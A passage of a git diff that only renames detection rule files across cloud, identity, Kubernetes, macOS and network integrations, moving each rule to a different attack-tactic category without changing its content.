to rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml rename to rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml diff --git a/rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_graph_first_occurrence_of_client_request.toml rename to rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml diff --git a/rules/integrations/azure/defense_evasion_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_automation_account_created.toml rename to rules/integrations/azure/persistence_automation_account_created.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_conditional_access_policy_modified.toml rename to rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_mfa_disabled_for_user.toml rename to rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_privileged_identity_management_role_modified.toml rename to rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml rename to rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml diff --git a/rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml similarity index 100% rename from rules/integrations/azure/initial_access_entra_id_user_signed_in_from_unusual_device.toml rename to rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml diff --git a/rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_graph_eam_addition_or_modification.toml rename to rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml diff --git a/rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml similarity index 100% rename from rules/integrations/azure/persistence_azure_rbac_administrator_roles_assigned.toml rename to rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml diff --git a/rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_elevate_to_user_administrator_access.toml rename to rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml diff --git a/rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml similarity index 100% rename from rules/integrations/azure/persistence_kubernetes_aks_rolebinding_created.toml rename to rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml diff --git a/rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml similarity index 100% rename from rules/integrations/ded/command_and_control_ml_high_bytes_destination_port.toml rename to rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml diff --git a/rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml similarity index 100% rename from rules/integrations/gcp/impact_gcp_pub_sub_subscription_deletion.toml rename to rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml diff --git a/rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml similarity index 100% rename from rules/integrations/gcp/impact_gcp_pub_sub_topic_deletion.toml rename to rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml diff --git a/rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml similarity index 100% rename from rules/integrations/gcp/persistence_gcp_storage_bucket_permissions_modified.toml rename to rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml diff --git a/rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml similarity index 100% rename from rules/integrations/gcp/impact_gcp_virtual_private_cloud_network_deleted.toml rename to rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml similarity index 100% rename from rules/integrations/gcp/defense_evasion_gcp_logging_sink_modification.toml rename to rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml diff --git a/rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml similarity index 100% rename from rules/integrations/gcp/persistence_gcp_iam_custom_role_creation.toml rename to rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml diff --git a/rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml similarity index 100% rename from rules/integrations/gcp/impact_gcp_iam_service_account_key_deletion.toml rename to rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml diff --git a/rules/integrations/github/defense_evasion_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml similarity index 100% rename from rules/integrations/github/defense_evasion_github_app_deleted.toml rename to rules/integrations/github/execution_github_app_deleted.toml diff --git a/rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml similarity index 100% rename from rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml rename to rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml diff --git a/rules/integrations/github/persistence_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml similarity index 100% rename from rules/integrations/github/persistence_new_github_app_installed.toml rename to rules/integrations/github/execution_new_github_app_installed.toml diff --git a/rules/integrations/github/collection_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml similarity index 100% rename from rules/integrations/github/collection_high_number_of_cloning_by_user.toml rename to rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml diff --git a/rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml similarity index 100% rename from rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml rename to rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml diff --git a/rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml similarity index 100% rename from rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml rename to rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml diff --git a/rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml similarity index 100% rename from rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml rename to rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml diff --git a/rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml similarity index 100% rename from rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml rename to rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml similarity index 100% rename from rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml rename to rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml diff --git a/rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml similarity index 100% rename from rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml rename to rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml diff --git a/rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml similarity index 100% rename from rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml rename to rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml diff --git a/rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml similarity index 100% rename from rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml rename to rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml similarity index 100% rename from rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml rename to rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml similarity index 100% rename from rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml rename to rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml diff --git a/rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml similarity index 100% rename from rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml rename to rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml diff --git a/rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml similarity index 100% rename from rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml rename to rules/integrations/kubernetes/discovery_denied_service_account_request.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml rename to rules/integrations/kubernetes/execution_forbidden_creation_request.toml diff --git a/rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml rename to rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml diff --git a/rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml rename to rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml diff --git a/rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml similarity index 100% rename from rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml rename to rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml diff --git a/rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml similarity index 100% rename from rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml rename to rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml similarity index 100% rename from rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml similarity index 100% rename from rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml diff --git a/rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml similarity index 100% rename from rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml diff --git a/rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml similarity index 100% rename from rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml rename to rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml diff --git a/rules/integrations/kubernetes/execution_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml similarity index 100% rename from rules/integrations/kubernetes/execution_privileged_pod_created.toml rename to rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml diff --git a/rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml similarity index 100% rename from rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml rename to rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml diff --git a/rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml similarity index 100% rename from rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml rename to rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml diff --git a/rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml similarity index 100% rename from rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml rename to rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml diff --git a/rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml similarity index 100% rename from rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml rename to rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml diff --git a/rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml similarity index 100% rename from rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml rename to rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml diff --git a/rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml similarity index 100% rename from rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml rename to rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml diff --git a/rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml similarity index 100% rename from rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml rename to rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml diff --git a/rules/integrations/o365/collection_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml similarity index 100% rename from rules/integrations/o365/collection_exchange_transport_rule_creation.toml rename to rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml diff --git a/rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml similarity index 100% rename from rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml rename to rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml diff --git a/rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml similarity index 100% rename from rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml rename to rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml diff --git a/rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml similarity index 100% rename from rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml rename to rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml diff --git a/rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml similarity index 100% rename from rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml rename to rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml diff --git a/rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml similarity index 100% rename from rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml rename to rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml diff --git a/rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml similarity index 100% rename from rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml rename to rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml diff --git a/rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml rename to rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml diff --git a/rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml rename to rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml diff --git a/rules/integrations/okta/defense_evasion_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_user_impersonation_access.toml rename to rules/integrations/okta/credential_access_user_impersonation_access.toml diff --git a/rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml similarity index 100% rename from rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml rename to rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml rename to rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml rename to rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml diff --git a/rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml rename to rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml diff --git a/rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml rename to rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml diff --git a/rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml rename to rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml diff --git a/rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml rename to rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml rename to rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml diff --git a/rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml rename to rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml diff --git a/rules/macos/execution_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml similarity index 100% rename from rules/macos/execution_perl_outbound_network_connection.toml rename to rules/macos/command_and_control_perl_outbound_network_connection.toml diff --git a/rules/macos/collection_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml similarity index 100% rename from rules/macos/collection_high_volume_of_pbpaste.toml rename to rules/macos/credential_access_high_volume_of_pbpaste.toml diff --git a/rules/macos/collection_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml similarity index 100% rename from rules/macos/collection_suspicious_tcc_access_granted.toml rename to rules/macos/defense_evasion_suspicious_tcc_access_granted.toml diff --git a/rules/macos/defense_evasion_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml similarity index 100% rename from rules/macos/defense_evasion_suspicious_sip_check.toml rename to rules/macos/discovery_suspicious_sip_check.toml diff --git a/rules/macos/command_and_control_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml similarity index 100% rename from rules/macos/command_and_control_installer_package_spawned_network_event.toml rename to rules/macos/execution_installer_package_spawned_network_event.toml diff --git a/rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml similarity index 100% rename from rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml rename to rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml diff --git a/rules/macos/execution_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml similarity index 100% rename from rules/macos/execution_suspicious_mac_ms_office_child_process.toml rename to rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml diff --git a/rules/macos/persistence_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml similarity index 100% rename from rules/macos/persistence_remote_ssh_login_enabled.toml rename to rules/macos/lateral_movement_remote_ssh_login_enabled.toml diff --git a/rules/macos/initial_access_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml similarity index 100% rename from rules/macos/initial_access_vpn_connection_attempt.toml rename to rules/macos/lateral_movement_vpn_connection_attempt.toml diff --git a/rules/macos/defense_evasion_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml similarity index 100% rename from rules/macos/defense_evasion_account_creation_hide_at_logon.toml rename to rules/macos/persistence_account_creation_hide_at_logon.toml diff --git a/rules/macos/command_and_control_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml similarity index 100% rename from rules/macos/command_and_control_curl_execution_via_shell_profile.toml rename to rules/macos/persistence_curl_execution_via_shell_profile.toml diff --git a/rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml similarity index 100% rename from rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml rename to rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml diff --git a/rules/macos/defense_evasion_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml similarity index 100% rename from rules/macos/defense_evasion_hidden_plist_filename.toml rename to rules/macos/persistence_hidden_plist_filename.toml diff --git a/rules/macos/execution_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml similarity index 100% rename from rules/macos/execution_applescript_with_admin_privs.toml rename to rules/macos/privilege_escalation_applescript_with_admin_privs.toml diff --git a/rules/macos/execution_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml similarity index 100% rename from rules/macos/execution_explicit_creds_via_scripting.toml rename to rules/macos/privilege_escalation_explicit_creds_via_scripting.toml diff --git a/rules/macos/persistence_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml similarity index 100% rename from rules/macos/persistence_local_user_added_to_admin.toml rename to rules/macos/privilege_escalation_local_user_added_to_admin.toml diff --git a/rules/macos/persistence_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml similarity index 100% rename from rules/macos/persistence_root_crontab_filemod.toml rename to rules/macos/privilege_escalation_root_crontab_filemod.toml diff --git a/rules/macos/persistence_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml similarity index 100% rename from rules/macos/persistence_user_added_to_admin_group.toml rename to rules/macos/privilege_escalation_user_added_to_admin_group.toml diff --git a/rules/ml/defense_evasion_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml similarity index 100% rename from rules/ml/defense_evasion_ml_windows_anomalous_script.toml rename to rules/ml/execution_ml_windows_anomalous_script.toml diff --git a/rules/ml/execution_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml similarity index 100% rename from rules/ml/execution_ml_rare_process_by_host_linux.toml rename to rules/ml/persistence_ml_rare_process_by_host_linux.toml diff --git a/rules/ml/execution_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml similarity index 100% rename from rules/ml/execution_ml_windows_anomalous_path_activity.toml rename to rules/ml/persistence_ml_windows_anomalous_path_activity.toml diff --git a/rules/ml/execution_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml similarity index 100% rename from rules/ml/execution_ml_windows_anomalous_process_creation.toml rename to rules/ml/persistence_ml_windows_anomalous_process_creation.toml diff --git a/rules/network/initial_access_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml similarity index 100% rename from rules/network/initial_access_accepted_default_telnet_port_connection.toml rename to rules/network/command_and_control_accepted_default_telnet_port_connection.toml diff --git a/rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml similarity index 100% rename from rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml rename to rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml diff --git a/rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml similarity index 100% rename from rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml rename to rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml diff --git a/rules/network/execution_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml similarity index 100% rename from 